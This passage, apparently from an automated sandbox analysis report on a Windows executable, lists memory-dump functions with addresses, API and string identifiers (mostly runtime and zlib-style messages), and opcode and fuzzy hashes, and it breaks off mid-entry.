                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                              • Instruction ID: b68ef11494f9cf9277a617ec124905cfcfad58d9ddf122eaaefe59ca5aca56dc
                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                              • Instruction Fuzzy Hash: D7111C22B14B058AEF008F60EC552A933A4FB59B58F441E31DA6D977A4EF78E6588341
                                                              Function 00007FF623F93C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: memcpy_s
                                                              • String ID:
                                                              • API String ID: 1502251526-0
                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                              • Instruction ID: fe25450a7377f7fba3f9cb403d6e7c8c280db989d2854015b488727c15b4a1d6
                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                              • Instruction Fuzzy Hash: B1C12672B1828687EB24CF19B44566AB7A1F798B84F41C135DB4E93794DF3DEA01CB40
                                                              Function 00007FF623F7A47B Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown header flags set
                                                              • API String ID: 0-1127688429
                                                              • Opcode ID: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                              • Instruction ID: 075591104b4d435772f00a43568e4a18e10653c56a60b5c7e785dd0ab24ad120
                                                              • Opcode Fuzzy Hash: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                              • Instruction Fuzzy Hash: AEF1A872A143C54BEFA58F18EC89B3A3AA9FF44744F0645B8DA49AB390DF38D641C741
                                                              Function 00007FF623F99728 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionRaise_clrfp
                                                              • String ID:
                                                              • API String ID: 15204871-0
                                                              • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                              • Instruction ID: daca12d4d8eeca10e44653e83962ec97712d60a05e5eec331851019c80f7da18
                                                              • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                              • Instruction Fuzzy Hash: 69B15873A00B898AEB19CF29D8863693BB0F784B48F1AC865DE5D837A4CF39D551C701
                                                              Function 00007FF623F839A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $
                                                              • API String ID: 0-227171996
                                                              • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                              • Instruction ID: c36fb820d61f5a70224018ccaa3846e7a7e563ef89a668a8ca842bbed2d5ca89
                                                              • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                              • Instruction Fuzzy Hash: 08E1C87AA0864641EF6C8F1AA85217D33A0FF45BC8F144176DA0EA77B4DF29EA51C702
                                                              Function 00007FF623F7A2DB Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: incorrect header check$invalid window size
                                                              • API String ID: 0-900081337
                                                              • Opcode ID: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                              • Instruction ID: b11e7808b213e265d8f116f2257d3484925af2841ce24cf3c3d9bbaa96a6272e
                                                              • Opcode Fuzzy Hash: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                              • Instruction Fuzzy Hash: 2B919A72A183C587EFA48F14EC49A3E3AA9FB45354F124179DA5A9B7D0CF38DA40CB41
                                                              Function 00007FF623F8DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: e+000$gfff
                                                              • API String ID: 0-3030954782
                                                              • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                              • Instruction ID: f5bce7f05748bbbc43ce641ba419b20c26139f4992c15f200a4157e8f4c94a2a
                                                              • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                              • Instruction Fuzzy Hash: 0F518C23B182C146EB288E36EC127697791EB54BD4F08C272DB988BAD5DF3DD500C702
                                                              Function 00007FF623F908C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                              • String ID:
                                                              • API String ID: 1010374628-0
                                                              • Opcode ID: 237fa8d459c5d11eae1bba494416b753c006fbba9c027a8b8839988129060696
                                                              • Instruction ID: dd7425a3289ec83797155ba979ac3992490d3c84d5ea21739f0e71b9d4798222
                                                              • Opcode Fuzzy Hash: 237fa8d459c5d11eae1bba494416b753c006fbba9c027a8b8839988129060696
                                                              • Instruction Fuzzy Hash: C302BE21B1E64740FE59AF12BC072792684AF45BA0F4586B5ED6DEBBD1DF3CE6018302
                                                              Function 00007FF623F8DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gfffffff
                                                              • API String ID: 0-1523873471
                                                              • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                              • Instruction ID: ae828a6a22f2797d1b8e7be45f585940fc1f14288c8a2cc87e9376645f858832
                                                              • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                              • Instruction Fuzzy Hash: DCA13563A087C986EF29CF2AB8017A97B91AF51BC4F048172EA4D97785DF3DD601C702
                                                              Function 00007FF623F88794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: TMP
                                                              • API String ID: 3215553584-3125297090
                                                              • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                              • Instruction ID: 2ec8db2b40a5ce3485ab908e0ae4d2b347b2cfd119dcd4f15b4906a6eeeb7af4
                                                              • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                              • Instruction Fuzzy Hash: 7D51AC11F0864241FE6CAB277E0317A5290AF44BD4F4988B4DE0EE77D6EF3CE6428202
                                                              Function 00007FF623F93480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                              • Instruction ID: 55b607156c2aa8d747172022451ff0e67bd232af38cc3b46825b752d747b651f
                                                              • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                              • Instruction Fuzzy Hash: 53B09220E07A02C2EE0A2F217C8321822A5BF48700F9841B9C04CAA330DF2C3AE55B02
                                                              Function 00007FF623F835A0 Relevance: .3, Instructions: 327COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                              • Instruction ID: 5c5e5e6666ce01bdde81a6622f44b13adae2c4f90915218c99f843f7a10ba2dc
                                                              • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                              • Instruction Fuzzy Hash: A0D10B2AA0864285EF6C8E2BA91263D2790FF05BC8F140276CD0DA77E5DF3DE645C742
                                                              Function 00007FF623F79800 Relevance: .3, Instructions: 287COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                              • Instruction ID: 7868931c81a2d3552bdeaac6cb5fb594dc35ba00c22a1b8777ec9c5587063e07
                                                              • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                              • Instruction Fuzzy Hash: EFC1BF722181E08BD289EB29E87947A73E1F78930DB95406BEF87477C5CB3CA514DB11
                                                              Function 00007FF623F82C10 Relevance: .2, Instructions: 241COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                              • Instruction ID: 02be20134fd579db7811c95c87c8a1cecd98fa4978c1ff0fe3dd3241e9d33157
                                                              • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                              • Instruction Fuzzy Hash: 11B1A17262874595EF688F3AE85213C3BA0FB49B88F244175CA4E97395CF39EA41C706
                                                              Function 00007FF623F8E570 Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                              • Instruction ID: 5c8c4a4d3fc8c2fb5620dd5d51f109e36d739b0ac8867b7ab613f270e9b1e3b8
                                                              • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                              • Instruction Fuzzy Hash: 26810672A1C78146DF78CF1AB84236A7A91FB55BD4F104275DA9D93B89EF3CE6008B01
                                                              Function 00007FF623F96418 Relevance: .2, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                              • Instruction ID: 1f12a1a238b4733dedad58eb2683a08258e8218211f9b656863ace31c2760c17
                                                              • Opcode Fuzzy Hash: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                              • Instruction Fuzzy Hash: 81612922F0C2C246FF648E69BC1263D6680AF40774F1482B9E61DE76D5DF7DEA008702
                                                              Function 00007FF623F81D54 Relevance: .1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                              • Instruction ID: cabd5bfa56a24461c296b12577fcb6fcbef4c553b2439a12c818cd9db5612e52
                                                              • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                              • Instruction Fuzzy Hash: 6E519577A1865582EB288B2AE44133833A0EB45B9CF244371DE4DA7795CF3AE953C741
                                                              Function 00007FF623F81944 Relevance: .1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                              • Instruction ID: bb25cf55c464bda9398e973141e1058187773b10895a11c9589444dd7c793159
                                                              • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                              • Instruction Fuzzy Hash: 6751C936A1865186EF288B2AE44527837B0EB44F98F244371CE8DA7794CF3AED43C741
                                                              Function 00007FF623F82164 Relevance: .1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                              • Instruction ID: bf59443ea13b0740f33a871c4dc92de19deb639dc51fbf6807feb7dc919272e2
                                                              • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                              • Instruction Fuzzy Hash: C1519A36A24A5591EF688B2AD85123833A1FB54B98F344171CE4DA7794CF3AFE43C741
                                                              Function 00007FF623F81740 Relevance: .1, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                              • Instruction ID: b04fe2c10f6ef188d76d8f5742178158de31f08afb4126292a3ffffcd6d4b93b
                                                              • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                              • Instruction Fuzzy Hash: 42519736A1465185EF288B2AE44263C37A1EB45B98F244275CE4DA7794CF3AED43C741
                                                              Function 00007FF623F81F60 Relevance: .1, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
